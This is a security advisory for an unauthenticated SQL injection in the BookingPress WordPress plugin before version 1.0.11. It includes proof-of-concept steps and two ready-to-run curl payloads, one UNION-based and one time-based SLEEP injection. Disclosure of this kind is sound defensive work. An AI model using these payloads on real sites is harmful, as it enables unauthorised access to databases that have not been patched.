BookingPress < 1.0.11 - Unauthenticated SQL Injection

The plugin fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection

PoC

- Create a new “category” and associate it with a new “service” via the BookingPress admin menu (/wp-admin/admin.php?page=bookingpress_services) - Create a new page with the “[bookingpress_form]” shortcode embedded (the “BookingPress Step-by-step Wizard Form”) - Visit the just created page as an unauthenticated user and extract the “nonce” (view source -> search for “action:‘bookingpress_front_get_category_services’”) - Invoke the following curl command curl -i ‘https://example.com/wp-admin/admin-ajax.php’ \ --data ‘action=bookingpress_front_get_category_services&_wpnonce=8cc8b79544&category;_id=33&total;_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -’ Time based payload: curl -i ‘https://example.com/wp-admin/admin-ajax.php’ \ --data ‘action=bookingpress_front_get_category_services&_wpnonce=8cc8b79544&category;_id=1&total;_service=1) AND (SELECT 9578 FROM (SELECT(SLEEP(5)))iyUp)-- ZmjH’